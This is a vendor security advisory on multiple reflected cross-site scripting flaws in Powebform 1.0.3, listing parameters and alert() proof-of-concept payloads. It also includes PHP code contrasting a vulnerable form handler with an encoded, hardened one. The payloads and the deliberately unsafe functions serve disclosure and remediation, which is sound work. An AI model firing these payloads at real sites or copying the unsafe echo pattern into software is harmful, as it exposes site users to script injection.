Multiple Reflected XSS Vulnerabilities in Powebform 1.0.3

Information

Advisory by Netsparker (now Invicti)
Name: Multiple Reflected XSS Vulnerabilities in Powebform 1.0.3
Affected Software: Powebform 1.0.3
Affected Versions: 1.0.3
Vendor Homepage: https://sourceforge.net/projects/powebform/files/powebform/1.0.3/ 
Vulnerability Type: Cross-site Scripting
Severity: Important
Status: Not Fixed
Invicti Advisory Reference: NS-17-007

Technical Details

Proof of Concept URLs for the Cross-site Scripting vulnerabilities in Powebform:

URL: /powebform-1.0.3/page1.php
Parameter Name: supp_fax
Parameter Type: POST
Attack Pattern: '"--></style></scRipt><scRipt>alert(0x000C4A)</scRipt>

URL: /powebform-1.0.3/page1.php
Parameter Name: anum_item
Parameter Type: POST
Attack Pattern: '"--></style></scRipt><scRipt>alert(0x000C5E)</scRipt>

URL: /powebform-1.0.3/page1.php
Parameter Name: supp_tele
Parameter Type: POST
Attack Pattern: '"--></style></scRipt><scRipt>alert(0x000C42)</scRipt>

URL: /powebform-1.0.3/page1.php
Parameter Name: supp_post
Parameter Type: POST
Attack Pattern: '"--></style></scRipt><scRipt>alert(0x000C3E)</scRipt>

URL: /powebform-1.0.3/page1.php
Parameter Name: supp_add4
Parameter Type: POST
Attack Pattern: '"--></style></scRipt><scRipt>alert(0x000C3A)</scRipt>

URL: /powebform-1.0.3/page1.php
Parameter Name: supp_add1
Parameter Type: POST
Attack Pattern: '"--></style></scRipt><scRipt>alert(0x000C0A)</scRipt>

URL: /powebform-1.0.3/page1.php
Parameter Name: supp_add3
Parameter Type: POST
Attack Pattern: '"--></style></scRipt><scRipt>alert(0x000C36)</scRipt>

URL: /powebform-1.0.3/page1.php
Parameter Name: supp_add2
Parameter Type: POST
Attack Pattern: '"--></style></scRipt><scRipt>alert(0x000C32)</scRipt>

URL: /powebform-1.0.3/page1.php
Parameter Name: budget
Parameter Type: POST
Attack Pattern: '"--></style></scRipt><scRipt>alert(0x000BFA)</scRipt>

URL: /powebform-1.0.3/page1.php
Parameter Name: dept
Parameter Type: POST
Attack Pattern: '"--></style></scRipt><scRipt>alert(0x0009C2)</scRipt>

URL: /powebform-1.0.3/page1.php
Parameter Name: supp_name
Parameter Type: POST
Attack Pattern: '"--></style></scRipt><scRipt>alert(0x000C02)</scRipt>

URL: /powebform-1.0.3/page1.php
Parameter Name: name
Parameter Type: POST
Attack Pattern: '"--></style></scRipt><scRipt>alert(0x000762)</scRipt>

URL: /powebform-1.0.3/page1.php/'"--></style></scRipt><scRipt>alert(0x0000E0)</scRipt>
Parameter Name: URI-BASED
Parameter Type: Full URL
Attack Pattern: /'"--></style></scRipt><scRipt>alert(0x0000E0)</scRipt>

URL: /powebform-1.0.3/page1.php/'"--></style></scRipt><scRipt>alert(0x0004AC)</scRipt>
Parameter Name: URI-BASED
Parameter Type: Full URL
Attack Pattern: /'"--></style></scRipt><scRipt>alert(0x0004AC)</scRipt>

URL: /powebform-1.0.3/page2.php
Parameter Name: quant_1
Parameter Type: POST
Attack Pattern: "><scRipt>alert(9)</scRipt>

URL: /powebform-1.0.3/page2.php
Parameter Name: quant_3
Parameter Type: POST
Attack Pattern: "><scRipt>alert(9)</scRipt>

URL: /powebform-1.0.3/page2.php
Parameter Name: quant_2
Parameter Type: POST
Attack Pattern: '"--></style></scRipt><scRipt>alert(0x000276)</scRipt>

URL: /powebform-1.0.3/page2.php
Parameter Name: code_3
Parameter Type: POST
Attack Pattern: '"--></style></scRipt><scRipt>alert(0x00027A)</scRipt>

URL: /powebform-1.0.3/page2.php
Parameter Name: code_2
Parameter Type: POST
Attack Pattern: "><iMg src=N onerror=alert(9)>

URL: /powebform-1.0.3/page2.php
Parameter Name: code_1
Parameter Type: POST
Attack Pattern: '"--></style></scRipt><scRipt>alert(0x000C34)</scRipt>

URL: /powebform-1.0.3/page2.php
Parameter Name: cost_1
Parameter Type: POST
Attack Pattern: '"--></style></scRipt><scRipt>alert(0x000C40)</scRipt>

URL: /powebform-1.0.3/page2.php
Parameter Name: cost_3
Parameter Type: POST
Attack Pattern: '"--></style></scRipt><scRipt>alert(0x000291)</scRipt>

URL: /powebform-1.0.3/page2.php
Parameter Name: cost_2
Parameter Type: POST
Attack Pattern: '"--></style></scRipt><scRipt>alert(0x000278)</scRipt>

URL: /powebform-1.0.3/page2.php
Parameter Name: shipping
Parameter Type: POST
Attack Pattern: '"--></style></scRipt><scRipt>alert(0x000292)</scRipt>

URL: /powebform-1.0.3/page2.php
Parameter Name: descrip_1
Parameter Type: POST
Attack Pattern: "><scRipt>alert(9)</scRipt>

URL: /powebform-1.0.3/page2.php
Parameter Name: descrip_2
Parameter Type: POST
Attack Pattern: '"--></style></scRipt><scRipt>alert(0x000274)</scRipt>

URL: /powebform-1.0.3/page2.php
Parameter Name: descrip_3
Parameter Type: POST
Attack Pattern: "><scRipt>alert(9)</scRipt>

URL: /powebform-1.0.3/page2.php/'"--></style></scRipt><scRipt>alert(0x0002F8)</scRipt>
Parameter Name: URI-BASED
Parameter Type: Full URL
Attack Pattern: /'"--></style></scRipt><scRipt>alert(0x0002F8)</scRipt>

URL: /powebform-1.0.3/page2.php/'"--></style></scRipt><scRipt>alert(0x0005BE)</scRipt>
Parameter Name: URI-BASED
Parameter Type: Full URL
Attack Pattern: /'"--></style></scRipt><scRipt>alert(0x0005BE)</scRipt>

For more information on cross-site scripting vulnerabilities, see Cross-site Scripting (XSS).
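Every finding above follows the same two shapes: a POST field echoed back into an attribute without encoding, and the request path (page1.php/<payload>) echoed into the page. The following PHP is an added illustration, not Powebform's own code: it shows a page1.php-style form handler in the unsafe shape that produces these findings and in a hardened shape. The field names come from the advisory; the page layout and the assumption that the URI-based variant comes from $_SERVER['PHP_SELF'] being used as the form action are ours, since the advisory does not state the root cause.

```php
<?php
// Added example, not Powebform's code. Field names are from the advisory; the
// form layout and the use of $_SERVER['PHP_SELF'] as the form action are
// assumptions about how such a page is typically built.

declare(strict_types=1);

// Fields the advisory lists for page1.php, all reflected back into the form.
const FIELDS = ['name', 'dept', 'budget', 'supp_name', 'supp_add1', 'supp_add2',
                'supp_add3', 'supp_add4', 'supp_post', 'supp_tele', 'supp_fax', 'anum_item'];

// Encode a value for use inside an HTML attribute or text node. ENT_QUOTES
// covers both ' and ", so single- and double-quoted attributes are both safe;
// ENT_SUBSTITUTE keeps invalid UTF-8 from producing an empty string.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Read one POST field as a string, defaulting to '' and rejecting arrays.
function field(string $name): string
{
    $v = $_POST[$name] ?? '';
    return is_string($v) ? $v : '';
}

// UNSAFE (the shape behind the POST findings): the raw value lands inside the
// value attribute, so a quote in the input closes the attribute and anything
// after it is parsed as markup.
function unsafeInput(string $name): string
{
    return '<input type="text" name="' . $name . '" value="' . field($name) . '">';
}

// SAFE: encode on output, at the point where the value enters HTML.
function safeInput(string $name): string
{
    return '<input type="text" name="' . h($name) . '" value="' . h(field($name)) . '">';
}

// UNSAFE (the assumed shape behind the URI-based findings): PHP_SELF includes
// any PATH_INFO suffix the client appended after page1.php, verbatim.
function unsafeFormAction(): string
{
    return '<form method="post" action="' . $_SERVER['PHP_SELF'] . '">';
}

// SAFE: SCRIPT_NAME carries no PATH_INFO, and it is encoded regardless.
function safeFormAction(): string
{
    return '<form method="post" action="' . h($_SERVER['SCRIPT_NAME']) . '">';
}

header('Content-Type: text/html; charset=UTF-8');
echo safeFormAction(), "\n";
foreach (FIELDS as $name) {
    echo safeInput($name), "\n";
}
echo '<input type="submit" value="Next"></form>', "\n";
```

The unsafe functions are left in only to show the defect; the page body calls the safe ones. Declaring the charset in the Content-Type header matters because htmlspecialchars encodes for the charset it is told, and a mismatch between the two reopens the problem. A Content-Security-Policy that disallows inline script does not fix the encoding bug but limits what a reflected payload can do while the fix is pending.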

Advisory Timeline

08 Feb 2017 – Advisory released

Solution

No solution is available at the time of publishing this advisory.

Credits & Authors

This issue has been discovered by Enes Aslanbakan while testing Invicti Web Application Security Scanner.

About Invicti

Invicti Security is transforming the way web applications are secured. Invicti empowers organizations in every industry to scale their overall security operations, make the best use of their security resources, and engage developers in helping to improve their overall security posture.